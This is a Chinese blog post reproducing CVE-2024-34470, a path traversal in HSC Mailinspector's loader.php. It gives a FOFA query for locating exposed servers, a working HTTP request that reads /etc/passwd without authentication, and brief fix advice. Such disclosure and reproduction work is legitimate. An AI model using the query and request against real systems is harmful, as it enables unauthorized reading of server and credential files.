HSC Mailinspector loader.php 任意文件读取漏洞复现(CVE-2024-34470)

已于 2024-06-03 11:50:44 修改
阅读量560 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-03 11:50:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139410598
版权

0x01 产品简介

HSC Mailinspector是一款远程电子邮件检查工具,支持POP3/IMAP4协议。它允许用户远程扫描最新邮件,并进行浏览、垃圾邮件排除、编辑、删除等操作,无需实际登录邮箱。

0x02 漏洞概述

由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。

0x03 影响范围

HSC Mailinspector 5.2.17-3 through 5.2.18

0x04 复现环境

FOFA:body="mailinspector/public"

0x05 漏洞复现

PoC

GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
订阅专栏
漏洞复现】telesquare tlr2005 getusernamepassword 信息泄露漏洞
qq_67810151的博客
03-11 379
Telesquare Tlr-2005Ksh存在信息泄露漏洞,未授权得攻击者可以通过该漏洞获取管理员账号密码,从而登录后台。
漏洞复现HSC Mailinspector loader.php 路径遍历漏洞(CVE-2024-34470)
qq_67810151的博客
06-07 193
HSC MailInspector /public/loader.php文件中存在的路径遍历漏洞。未经身份验证的用户可以滥用/public/loader.php文件中存在的路径遍历漏洞。path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使攻击者能够读取服务器上的任意文件
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 648
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
漏洞复现HSC Mailinspector loader.php 任意文件读取漏洞(CVE-2024-34470)
siu~
06-05 303
由于HSC Mainspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。
漏洞复现HSC Mailinspector loader.php 任意文件读取漏洞(CVE-2024-34470)
qq_39894062的博客
06-04 570
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
HSC-1th writeup
02-21 5021
HSC-1th 2022
http://syy7.com/a/33.php,eDrawings
热门推荐
weixin_33298352的博客
03-22 5万+
OzsgSFNGIFYxMi4wMCAKSQAAAABCAClcD76RdCW+ZmamvilcDz7nSyU+/tR4Plp42uy9B1gUSdAw3LMzsxF2CUqWqAISZMmrLGLOogLmgAEjJjB7ypizZz5z9kxnzsqa4+l5Zr2A4c6cc9b9u3p2hh1ED/De9/u/7zkenW6a3aqu6pruSt3dvDiF0B51eFhYdEiYPjQs...
云计算虚拟化:k8s进阶-CRD开发基础
dustzhu的博客
01-01 5875
一. 前言 CRD:Custom Resources Definition,即在Kubernetes 中添加一个和 Pod、service 类似的、新的 API 资源类型,用于统一部署/编排多个内置K8S资源(pod,service等)。 为什么需要CRD? helm也可以做到统一部署/编排deployment,service,ingress,但它缺乏对资源的全生命周期的监控,CRD通过apiserver接口,在etcd中注册一种新的资源类型,此后就可以创建对应的资源对象&并监控它们的状态&
《高效玩转 vscode》- 1:基础编程环境搭建
qq_40466537的博客
03-30 270
介绍vscode基础编程环境的搭建、包括但不限于c/c++、代码格式化等。后续会陆续补充
APM-HSC功能示例程序.zip
04-02
APM-HSC(High Speed Control)是高级过程管理与高速控制的缩写,通常用于复杂的自动化系统中,尤其是在工业自动化领域。此压缩包"APM-HSC功能示例程序.zip"包含了关于APM-HSC功能的示例程序,旨在帮助用户理解和...
HSC-1.github.io
03-10
月亮吉基尔主题 Sorry guys but there will be no update until I buy a new laptop. ######(如果您喜欢或使用此主题,请给 :star: 激励。) 是一个最小的单列jekyll主题。 特征 最少,您可以专注于自己的内容 ...
NX70高速计数器NX70-HSC1NX70-HSC2-RockwellAutomation.pdf
09-10
NX70高速计数器NX70-HSC1NX70-HSC2-RockwellAutomation.pdf
计算机研究 -谱聚类算法研究.pdf
07-01
HSC算法结合了层次聚类的高聚类精度与谱聚类的优势,避免了由于使用谱聚类可能导致的不均衡划分问题。实验结果显示,HSC在聚类质量和计算速度上均优于传统的谱聚类和层次聚类。 2. 提出了一种基于亲和传播的谱聚类...
hsc2hs:.hsc文件的预处理器
02-04
标题“hsc2hs:.hsc文件的预处理器”指出了一个名为hsc2hs的工具,它专门用于处理.hsc扩展名的文件。这类文件是Haskell语言中的特殊源代码文件,它们允许程序员在Haskell程序中方便地集成C代码。预处理器的角色是在...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 550
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
邮件安全篇:邮件端到端加密S/MIME
最新发布
sdexcel的专栏
07-19 803
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 817
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
filter->vpp_hsc_start_phase_step = ratio_x << 6;
05-28
这段代码将变量 "ratio_x" 左移 6 位,并将其值赋给 "filter->vpp_hsc_start_phase_step" 变量。这个操作相当于将 "ratio_x" 乘以 64,因为左移 6 位相当于乘以 2 的 6 次方(2^6 = 64)。因此,这行代码的作用是将 "ratio_x" 值扩大 64 倍,并将结果存储在 "filter->vpp_hsc_start_phase_step" 变量中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值